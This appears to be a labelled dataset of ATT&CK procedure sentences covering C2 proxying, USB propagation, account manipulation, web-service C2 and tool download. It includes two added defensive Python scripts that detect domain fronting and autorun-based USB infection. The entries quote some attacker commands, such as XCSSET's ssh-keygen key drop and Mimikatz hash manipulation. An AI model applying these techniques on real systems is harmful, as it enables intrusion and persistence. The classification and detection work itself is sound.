{"text1":"APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.","labels":"['T1090.003']"}
|
|
{"text1":"CostaRicto has used a layer of proxies to manage C2 communications.","labels":"['T1090.003']"}
|
|
{"text1":"Cyclops Blink has used Tor nodes for C2 traffic.","labels":"['T1090.003']"}
|
|
{"text1":"Dok downloads and installs Tor via homebrew.","labels":"['T1090.003']"}
|
|
{"text1":"Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.","labels":"['T1090.003']"}
|
|
{"text1":"During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes.","labels":"['T1090.003']"}
|
|
{"text1":"FIN4 has used Tor to log in to victims' email accounts.","labels":"['T1090.003']"}
|
|
{"text1":"GreyEnergy has used Tor relays for Command and Control servers.","labels":"['T1090.003']"}
|
|
{"text1":"Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.","labels":"['T1090.003']"}
|
|
{"text1":"Industroyer used Tor nodes for C2.","labels":"['T1090.003']"}
|
|
{"text1":"MacSpy uses Tor for command and control.","labels":"['T1090.003']"}
|
|
{"text1":"Operation Wocao has executed commands through the installed web shell via Tor exit nodes.","labels":"['T1090.003']"}
|
|
{"text1":"StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.","labels":"['T1090.003']"}
|
|
{"text1":"Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination.","labels":"['T1090.003']"}
|
|
{"text1":"Ursnif has used Tor for C2.","labels":"['T1090.003']"}
|
|
{"text1":"WannaCry uses Tor for command and control traffic.","labels":"['T1090.003']"}
|
|
{"text1":"APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.","labels":"['T1090.004']"}
|
|
{"text1":"Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting.","labels":"['T1090.004']"}
|
|
{"text1":"SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain.","labels":"['T1090.004']"}
|
|
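The three T1090.004 entries above (APT29's meek plugin for Tor, Cobalt Strike accepting an arbitrary HTTP Host header, SMOKEDHAM's fronted domain) all rely on the same trick: the TLS SNI names a high-reputation CDN front, while the HTTP Host header inside the tunnel names the real backend, and the CDN routes on the Host header. The check a defender can run is therefore a comparison of SNI against Host. The block below is an added example written for this page, not code from any of those tools or from MITRE ATT&CK; it assumes a TLS-inspecting proxy that logs both fields (the record layout and every hostname are constructed placeholders), and it uses a crude last-two-labels notion of registrable domain rather than the Public Suffix List.

```python
"""SNI / Host-header disagreement check for domain-fronting triage.

Added example; records are constructed, not real traffic."""
from dataclasses import dataclass


@dataclass(frozen=True)
class TlsHttpRecord:
    """One request as logged by a hypothetical TLS-inspecting proxy (field names assumed)."""
    src_ip: str
    sni: str    # server_name from the TLS ClientHello: what the network sees
    host: str   # HTTP Host header inside the tunnel: what the CDN routes on
    path: str


# Constructed sample records (not real traffic). Only the third one is fronted:
# the second is an ordinary CDN alias within the same registrable domain.
SAMPLE_RECORDS = [
    TlsHttpRecord("10.0.0.5", "www.example.com", "www.example.com", "/index.html"),
    TlsHttpRecord("10.0.0.5", "cdn.example.net", "static.example.net", "/lib.js"),
    TlsHttpRecord("10.0.0.7", "front.example-cdn.org", "reflector.hidden-c2.example", "/"),
    TlsHttpRecord("10.0.0.9", "front.example-cdn.org", "front.example-cdn.org", "/a.png"),
]


def registrable_domain(name: str) -> str:
    """Crude eTLD+1 (last two labels). Production code should consult the Public Suffix List."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_fronted(rec: TlsHttpRecord) -> bool:
    """True when the Host header lives under a different registrable domain than the SNI."""
    return registrable_domain(rec.sni) != registrable_domain(rec.host)


def fronting_candidates(records, allowlist=frozenset()):
    """Records with SNI/Host disagreement, minus (sni, host) pairs known to be legitimate."""
    return [r for r in records
            if is_fronted(r) and (r.sni.lower(), r.host.lower()) not in allowlist]


if __name__ == "__main__":
    for r in fronting_candidates(SAMPLE_RECORDS):
        print(f"{r.src_ip}: SNI={r.sni} Host={r.host} {r.path}")
```

Two caveats apply in practice: without TLS inspection the Host header is invisible, so the only network-side signal is the SNI of the CDN front, which is exactly what fronting is designed to make look benign; and some legitimate CDN and SaaS setups do send a Host header outside the SNI's domain, so the allowlist has to be populated from baseline traffic before the check is used for alerting.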
{"text1":"APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.","labels":"['T1091']"}
|
|
{"text1":"APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.","labels":"['T1091']"}
|
|
{"text1":"Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.","labels":"['T1091']"}
|
|
{"text1":"Conficker variants used the Windows AUTORUN feature to spread through USB propagation.","labels":"['T1091']"}
|
|
{"text1":"Crimson can spread across systems by infecting removable media.","labels":"['T1091']"}
|
|
{"text1":"Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.","labels":"['T1091']"}
|
|
{"text1":"DustySky searches for removable media and duplicates itself onto it.","labels":"['T1091']"}
|
|
{"text1":"FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.","labels":"['T1091']"}
|
|
{"text1":"Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.","labels":"['T1091']"}
|
|
{"text1":"H1N1 has functionality to copy itself to removable media.","labels":"['T1091']"}
|
|
{"text1":"Mustang Panda has used a customized PlugX variant which could spread through USB connections.","labels":"['T1091']"}
|
|
{"text1":"Ramsay can spread itself by infecting other portable executable files on removable drives.","labels":"['T1091']"}
|
|
{"text1":"Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.","labels":"['T1091']"}
|
|
{"text1":"USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.","labels":"['T1091']"}
|
|
{"text1":"USBferry can copy its installer to attached USB storage devices.","labels":"['T1091']"}
|
|
{"text1":"Ursnif has copied itself to and infected removable drives for propagation.","labels":"['T1091']"}
|
|
{"text1":"njRAT can be configured to spread via removable drives.","labels":"['T1091']"}
|
|
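Two of the T1091 mechanisms above are visible on the drive itself: an autorun.inf whose open= or shellexecute= entry points at the dropped file (Agent.btz, USBStealer, Conficker, Flame, Stuxnet), and SHIPSHAPE's decoy pattern of hiding a legitimate document and placing an executable with the same name beside it. The following is an added example written for this page, not code from any of those samples or from MITRE ATT&CK. It scans a mounted drive root for both patterns; the drive layout it checks is constructed in a temporary directory with placeholder bytes, and the hidden-attribute part of the SHIPSHAPE check is omitted because it is not portable off Windows.

```python
"""Triage of a mounted removable drive for the two propagation tricks described above:
an autorun.inf that launches a program, and an executable posing as a document.

Added example; the sample drive is constructed in a temp dir, not a real infection."""
import configparser
import tempfile
from glob import escape
from pathlib import Path

DOC_EXT = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf"}
EXE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}


def parse_autorun(text: str) -> dict:
    """Lower-cased key/value pairs of the [autorun] section; {} if absent or malformed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    sec = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    return dict(cp[sec]) if sec else {}


def autorun_launch_targets(text: str) -> list:
    """Programs an autorun.inf asks Windows to run: open=, shellexecute= and shell\\...\\command=."""
    kv = parse_autorun(text)
    return [v.strip() for k, v in kv.items()
            if v and (k in ("open", "shellexecute") or k.startswith("shell\\"))]


def find_decoy_pairs(root) -> list:
    """Executables sharing a filename stem with a document in the same folder
    (the SHIPSHAPE-style decoy; the hidden-attribute check is omitted for portability)."""
    root = Path(root)
    pairs = []
    for exe in root.rglob("*"):
        if exe.suffix.lower() not in EXE_EXT:
            continue
        for doc in exe.parent.glob(escape(exe.stem) + ".*"):
            if doc.suffix.lower() in DOC_EXT:
                pairs.append((doc.relative_to(root).as_posix(), exe.relative_to(root).as_posix()))
    return sorted(pairs)


def scan_removable_drive(root) -> dict:
    """Combine both checks for one mounted drive root."""
    root = Path(root)
    inf = root / "autorun.inf"
    targets = autorun_launch_targets(inf.read_text(errors="ignore")) if inf.is_file() else []
    return {"autorun_targets": targets, "decoy_pairs": find_decoy_pairs(root)}


def build_sample_drive() -> Path:
    """Constructed layout imitating an infected USB stick (placeholder bytes, not malware)."""
    root = Path(tempfile.mkdtemp(prefix="usb_"))
    (root / "autorun.inf").write_text(
        "[autorun]\nopen=RECYCLER\\update.exe\nshellexecute=RECYCLER\\update.exe\n"
        "icon=%SystemRoot%\\system32\\shell32.dll,4\n")
    (root / "RECYCLER").mkdir()
    (root / "RECYCLER" / "update.exe").write_bytes(b"MZ")
    (root / "reports").mkdir()
    (root / "reports" / "Q3 budget.docx").write_bytes(b"PK")
    (root / "reports" / "Q3 budget.exe").write_bytes(b"MZ")   # decoy beside the real document
    (root / "reports" / "notes.txt").write_text("benign")
    return root


if __name__ == "__main__":
    print(scan_removable_drive(build_sample_drive()))
```

Modern Windows no longer honours autorun.inf on USB mass storage, so the first check mostly catches older infections and drives prepared for legacy or air-gapped hosts; the decoy check remains relevant because it depends only on a user double-clicking what looks like a document.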
{"text1":"USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.","labels":"['T1092']"}
|
|
{"text1":"Anchor has used ICMP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"Aria-body has used TCP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"AuTo Stealer can use TCP to communicate with command and control servers.","labels":"['T1095']"}
|
|
{"text1":"BITTER has used TCP for C2 communications.","labels":"['T1095']"}
|
|
{"text1":"BUBBLEWRAP can communicate using SOCKS.","labels":"['T1095']"}
|
|
{"text1":"BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.","labels":"['T1095']"}
|
|
{"text1":"Bandook has a command built in to use a raw TCP socket.","labels":"['T1095']"}
|
|
{"text1":"Carbon uses TCP and UDP for C2.","labels":"['T1095']"}
|
|
{"text1":"Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications.","labels":"['T1095']"}
|
|
{"text1":"Cryptoistic can use TCP in communications with C2.","labels":"['T1095']"}
|
|
{"text1":"Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.","labels":"['T1095']"}
|
|
{"text1":"Drovorub can use TCP to communicate between its agent and client modules.","labels":"['T1095']"}
|
|
{"text1":"FIN6 has used Metasploit Bind and Reverse TCP stagers.","labels":"['T1095']"}
|
|
{"text1":"FunnyDream can communicate with C2 over TCP and UDP.","labels":"['T1095']"}
|
|
{"text1":"Gelsemium has the ability to use TCP and UDP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"HAFNIUM has used TCP for C2.","labels":"['T1095']"}
|
|
{"text1":"If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP\/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.","labels":"['T1095']"}
|
|
{"text1":"LookBack uses a custom binary protocol over sockets for C2 communications.","labels":"['T1095']"}
|
|
{"text1":"MacMa has used a custom JSON-based protocol for its C&C communications.","labels":"['T1095']"}
|
|
{"text1":"Metamorfo has used raw TCP for C2.","labels":"['T1095']"}
|
|
{"text1":"Mis-Type network traffic can communicate over a raw socket.","labels":"['T1095']"}
|
|
{"text1":"MoonWind completes network communication via raw sockets.","labels":"['T1095']"}
|
|
{"text1":"Mythic supports WebSocket and TCP-based C2 profiles.","labels":"['T1095']"}
|
|
{"text1":"NETWIRE can use TCP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"Nebulae can use TCP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"PLATINUM has used the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.","labels":"['T1095']"}
|
|
{"text1":"Pay2Key has sent its public key to the C2 server over TCP.","labels":"['T1095']"}
|
|
{"text1":"PingPull variants have the ability to communicate with C2 servers using ICMP or TCP.","labels":"['T1095']"}
|
|
{"text1":"QuasarRAT can use TCP for C2 communication.","labels":"['T1095']"}
|
|
{"text1":"RCSession has the ability to use TCP and UDP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"RainyDay can use TCP in C2 communications.","labels":"['T1095']"}
|
|
{"text1":"Remsec is capable of using ICMP, TCP, and UDP for C2.","labels":"['T1095']"}
|
|
{"text1":"SDBbot has the ability to communicate with C2 with TCP over port 443.","labels":"['T1095']"}
|
|
{"text1":"SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server.","labels":"['T1095']"}
|
|
{"text1":"Some Reaver variants use raw TCP for C2.","labels":"['T1095']"}
|
|
{"text1":"Some variants of FakeM use SSL to communicate with C2 servers.","labels":"['T1095']"}
|
|
{"text1":"TSCookie can use ICMP to receive information on the destination server.","labels":"['T1095']"}
|
|
{"text1":"Taidoor can use TCP for C2 communications.","labels":"['T1095']"}
|
|
{"text1":"WINDSHIELD C2 traffic can communicate via TCP raw sockets.","labels":"['T1095']"}
|
|
{"text1":"Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications.","labels":"['T1095']"}
|
|
{"text1":"Winnti for Windows can communicate using custom TCP.","labels":"['T1095']"}
|
|
{"text1":"gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2.","labels":"['T1095']"}
|
|
{"text1":"APT3 has been known to add created accounts to local admin groups to maintain elevated access.","labels":"['T1098']"}
|
|
{"text1":"Kimsuky has added accounts to specific groups with \"net localgroup\".","labels":"['T1098']"}
|
|
{"text1":"Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.","labels":"['T1098']"}
|
|
{"text1":"Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.","labels":"['T1098', 'T1098.002']"}
|
|
{"text1":"Sandworm Team used the \"sp_addlinkedsrvlogin\" command in MS-SQL to create a link between a created account and other servers in the network.","labels":"['T1098']"}
|
|
{"text1":"The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The \"LSADUMP::ChangeNTLM\" and \"LSADUMP::SetNTLM\" modules can also manipulate the password hash of an account without knowing the clear text value.","labels":"['T1098']"}
|
|
{"text1":"APT29 has added credentials to OAuth Applications and Service Principals.","labels":"['T1098.001']"}
|
|
{"text1":"UNC2452 added credentials to OAuth Applications and Service Principals.","labels":"['T1098.001']"}
|
|
{"text1":"APT28 has used a Powershell cmdlet to grant the \"ApplicationImpersonation\" role to a compromised account.","labels":"['T1098.002']"}
|
|
{"text1":"APT29 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.","labels":"['T1098.002']"}
|
|
{"text1":"UNC2452 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.","labels":"['T1098.002']"}
|
|
{"text1":"APT29 has granted `company administrator` privileges to a newly created service principal.","labels":"['T1098.003']"}
|
|
{"text1":"Bundlore creates a new key pair with \"ssh-keygen\" and drops the newly created user key in \"authorized_keys\" to enable remote login.","labels":"['T1098.004']"}
|
|
{"text1":"Earth Lusca has dropped an SSH-authorized key in the `\/root\/.ssh` folder in order to access a compromised server with SSH.","labels":"['T1098.004']"}
|
|
{"text1":"Skidmap has the ability to add the public key of its handlers to the \"authorized_keys\" file to maintain persistence on an infected host.","labels":"['T1098.004']"}
|
|
{"text1":"TeamTNT has added RSA keys in \"authorized_keys\".","labels":"['T1098.004']"}
|
|
{"text1":"XCSSET will create an ssh key if necessary with the \"ssh-keygen -t rsa -f $HOME\/.ssh\/id_rsa -P\" command. XCSSET will upload a private key file to the server to remotely access the host without a password.","labels":"['T1098.004']"}
|
|
{"text1":"AADInternals can register a device to Azure AD.","labels":"['T1098.005']"}
|
|
{"text1":"APT29 registered devices in order to enable mailbox syncing via the \"Set-CASMailbox\" command.","labels":"['T1098.005']"}
|
|
{"text1":"APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.","labels":"['T1102']"}
|
|
{"text1":"Bazar downloads have been hosted on Google Docs.","labels":"['T1102']"}
|
|
{"text1":"BoomBox can download files from Dropbox using a hardcoded access token.","labels":"['T1102']"}
|
|
{"text1":"Bumblebee has been downloaded to victims' machines from OneDrive.","labels":"['T1102']"}
|
|
{"text1":"Chimera has used Google Cloud's appspot service to host C2 servers.","labels":"['T1102']"}
|
|
{"text1":"Doki has used the dogechain.info API to generate a C2 address.","labels":"['T1102']"}
|
|
{"text1":"During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads.","labels":"['T1102']"}
|
|
{"text1":"EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.","labels":"['T1102']"}
|
|
{"text1":"Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.","labels":"['T1102']"}
|
|
{"text1":"FIN6 has used Pastebin and Google Storage to host content for their operations.","labels":"['T1102']"}
|
|
{"text1":"FIN8 has used \"sslip.io\", a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.","labels":"['T1102']"}
|
|
{"text1":"Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.","labels":"['T1102']"}
|
|
{"text1":"Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.","labels":"['T1102']"}
|
|
{"text1":"LazyScripter has used GitHub to host its payloads to operate spam campaigns.","labels":"['T1102']"}
|
|
{"text1":"Mustang Panda has used DropBox URLs to deliver variants of PlugX.","labels":"['T1102']"}
|
|
{"text1":"NETWIRE has used web services including Paste.ee to host payloads.","labels":"['T1102']"}
|
|
{"text1":"SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links.","labels":"['T1102']"}
|
|
{"text1":"SharpStage has used a legitimate web service for evading detection.","labels":"['T1102']"}
|
|
{"text1":"TeamTNT has leveraged iplogger.org to send collected data back to C2.","labels":"['T1102']"}
|
|
{"text1":"Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.","labels":"['T1102']"}
|
|
{"text1":"WhisperGate can download additional payloads hosted on a Discord channel.","labels":"['T1102']"}
|
|
{"text1":"Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.","labels":"['T1102.001']"}
|
|
{"text1":"BLACKCOFFEE uses Microsoft\u2019s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.","labels":"['T1102.001']"}
|
|
{"text1":"CharmPower can retrieve C2 domain information from actor-controlled S3 buckets.","labels":"['T1102.001']"}
|
|
{"text1":"Javali can read C2 information from Google Documents and YouTube.","labels":"['T1102.001']"}
|
|
{"text1":"Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.","labels":"['T1102.001']"}
|
|
{"text1":"PlugX uses Pastebin to store C2 addresses.","labels":"['T1102.001']"}
|
|
{"text1":"PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.","labels":"['T1102.001']"}
|
|
{"text1":"RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.","labels":"['T1102.001']"}
|
|
{"text1":"RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.","labels":"['T1102.001']"}
|
|
{"text1":"Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.","labels":"['T1102.001']"}
|
|
{"text1":"Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.","labels":"['T1102.001']"}
|
|
{"text1":"A Turla JavaScript backdoor has used Google Apps Script as its C2 server.","labels":"['T1102.002']"}
|
|
{"text1":"APT12 has used blogs and WordPress for C2 infrastructure.","labels":"['T1102.002']"}
|
|
{"text1":"APT28 has used Google Drive for C2.","labels":"['T1102.002']"}
|
|
{"text1":"APT29 has used social media platforms to hide communications to C2 servers.","labels":"['T1102.002']"}
|
|
{"text1":"APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.","labels":"['T1102.002']"}
|
|
{"text1":"BLUELIGHT can use different cloud providers for its C2.","labels":"['T1102.002']"}
|
|
{"text1":"BoxCaon has used DropBox for C2 communications.","labels":"['T1102.002']"}
|
|
{"text1":"Carbanak has used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2.","labels":"['T1102.002']"}
|
|
{"text1":"ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information.","labels":"['T1102.002']"}
|
|
{"text1":"Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.","labels":"['T1102.002']"}
|
|
{"text1":"CreepyDrive can use OneDrive for C2.","labels":"['T1102.002']"}
|
|
{"text1":"Crutch can use Dropbox to receive commands and upload stolen data.","labels":"['T1102.002']"}
|
|
{"text1":"DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.","labels":"['T1102.002']"}
|
|
{"text1":"Empire can use Dropbox and GitHub for C2.","labels":"['T1102.002']"}
|
|
{"text1":"FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.","labels":"['T1102.002']"}
|
|
{"text1":"Grandoreiro can utilize web services including Google sites to send and receive C2 data.","labels":"['T1102.002']"}
|
|
{"text1":"HEXANE has used cloud services, including OneDrive, for C2.","labels":"['T1102.002']"}
|
|
{"text1":"KARAE can use public cloud-based storage providers for command and control.","labels":"['T1102.002']"}
|
|
{"text1":"Kazuar has used compromised WordPress blogs as C2 servers.","labels":"['T1102.002']"}
|
|
{"text1":"LOWBALL uses the Dropbox cloud storage service for command and control.","labels":"['T1102.002']"}
|
|
{"text1":"Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.","labels":"['T1102.002']"}
|
|
{"text1":"MuddyWater has used web services including OneHub to distribute remote access tools.","labels":"['T1102.002']"}
|
|
{"text1":"One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.","labels":"['T1102.002']"}
|
|
{"text1":"Orz has used Technet and Pastebin web pages for command and control.","labels":"['T1102.002']"}
|
|
{"text1":"POORAIM has used AOL Instant Messenger for C2.","labels":"['T1102.002']"}
|
|
{"text1":"RogueRobin has used Google Drive as a Command and Control channel.","labels":"['T1102.002']"}
|
|
{"text1":"SLOWDRIFT uses cloud-based services for C2.","labels":"['T1102.002']"}
|
|
{"text1":"Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.","labels":"['T1102.002']"}
|
|
{"text1":"The CALENDAR malware communicates through the use of events in Google Calendar.","labels":"['T1102.002']"}
|
|
{"text1":"UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.","labels":"['T1102.002']"}
|
|
{"text1":"ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.","labels":"['T1102.002']"}
|
|
{"text1":"yty communicates to the C2 server by retrieving a Google Doc.","labels":"['T1102.002']"}
|
|
{"text1":"EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.","labels":"['T1102.003']"}
|
|
{"text1":"Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.","labels":"['T1102.003']"}
|
|
{"text1":"Metamorfo has downloaded a zip file for execution on the system.","labels":"['T1102.003']"}
|
|
{"text1":"OnionDuke uses Twitter as a backup C2.","labels":"['T1102.003']"}
|
|
{"text1":"The \"tDiscoverer\" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.","labels":"['T1102.003']"}
|
|
{"text1":"APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.","labels":"['T1104']"}
|
|
{"text1":"BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.","labels":"['T1104']"}
|
|
{"text1":"BLACKCOFFEE uses Microsoft\u2019s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims\u2019 machines.","labels":"['T1104']"}
|
|
{"text1":"Lazarus Group has used multi-stage malware components that inject later stages into separate processes.","labels":"['T1104']"}
|
|
{"text1":"MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.","labels":"['T1104']"}
|
|
{"text1":"The Bazar loader is used to download and execute the Bazar backdoor.","labels":"['T1104']"}
|
|
{"text1":"Valak can download additional modules and malware capable of using separate C2 channels.","labels":"['T1104']"}
|
|
{"text1":"APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access.","labels":"['T1105']"}
|
|
{"text1":"APT33 has downloaded additional files and programs from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"APT34 can download remote files onto victims.","labels":"['T1105']"}
|
|
{"text1":"APT37 has downloaded second stage malware from compromised websites.","labels":"['T1105']"}
|
|
{"text1":"APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"APT39 has downloaded tools to compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"Action RAT has the ability to download additional payloads onto an infected machine.","labels":"['T1105']"}
|
|
{"text1":"Agent.btz attempts to download an encrypted binary from a specified domain.","labels":"['T1105']"}
|
|
{"text1":"Ajax Security Team has used Wrapper\/Gholee, custom-developed malware, which downloaded additional malware to the infected system.","labels":"['T1105']"}
|
|
{"text1":"Andariel has downloaded additional tools and malware onto compromised hosts.","labels":"['T1105']"}
|
|
{"text1":"Aria-body has the ability to download additional payloads from C2.","labels":"['T1105']"}
|
|
{"text1":"Astaroth uses certutil and BITSAdmin to download additional malware.","labels":"['T1105']"}
|
|
{"text1":"Attor can download additional plugins, updates and other files.","labels":"['T1105']"}
|
|
{"text1":"AuditCred can download files and additional malware.","labels":"['T1105']"}
|
|
{"text1":"BADFLICK has downloaded files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.","labels":"['T1105']"}
|
|
{"text1":"BBK has the ability to download files from C2 to the infected host.","labels":"['T1105']"}
|
|
{"text1":"BISCUIT has a command to download a file from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"BITSAdmin can be used to create BITS Jobs to upload and\/or download files.","labels":"['T1105']"}
|
|
{"text1":"BITTER has downloaded additional malware and tools onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"BLINDINGCAN has downloaded files to a victim machine.","labels":"['T1105']"}
|
|
{"text1":"BLUELIGHT can download additional files onto the host.","labels":"['T1105']"}
|
|
{"text1":"BONDUPDATER can download or upload files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).","labels":"['T1105']"}
|
|
{"text1":"Backdoor.Oldrea can download additional modules from C2.","labels":"['T1105']"}
|
|
{"text1":"BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.","labels":"['T1105']"}
|
|
{"text1":"BadPatch can download and execute or update malware.","labels":"['T1105']"}
|
|
{"text1":"Bankshot uploads files and secondary payloads to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.","labels":"['T1105']"}
|
|
{"text1":"BendyBear is designed to download an implant from a C2 server.","labels":"['T1105']"}
|
|
{"text1":"Bisonal has the capability to download files to execute on the victim\u2019s machine.","labels":"['T1105']"}
|
|
{"text1":"BlackMould has the ability to download files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"BoomBox has the ability to download next stage malware components to a compromised system.","labels":"['T1105']"}
|
|
{"text1":"BoxCaon can download files.","labels":"['T1105']"}
|
|
{"text1":"Briba downloads files onto infected hosts.","labels":"['T1105']"}
|
|
{"text1":"Bumblebee can download and execute additional payloads including through the use of a `Dex` command.","labels":"['T1105']"}
|
|
{"text1":"CARROTBALL has the ability to download and install a remote payload.","labels":"['T1105']"}
|
|
{"text1":"CHOPSTICK is capable of performing remote file transmission.","labels":"['T1105']"}
|
|
{"text1":"CORESHELL downloads another dropper from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"CSPY Downloader can download additional tools to a compromised host.","labels":"['T1105']"}
|
|
{"text1":"Calisto has the capability to upload and download files to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"CallMe has the capability to download a file to the victim from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Cannon can download a payload for execution.","labels":"['T1105']"}
|
|
{"text1":"Carberp can download and execute new plugins from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"Caterpillar WebShell has a module to download and upload files to the system.","labels":"['T1105']"}
|
|
{"text1":"ChChes is capable of downloading files, including additional modules.","labels":"['T1105']"}
|
|
{"text1":"Chaes can download additional files onto an infected machine.","labels":"['T1105']"}
|
|
{"text1":"Chimera has remotely copied tools and malware onto targeted systems.","labels":"['T1105']"}
|
|
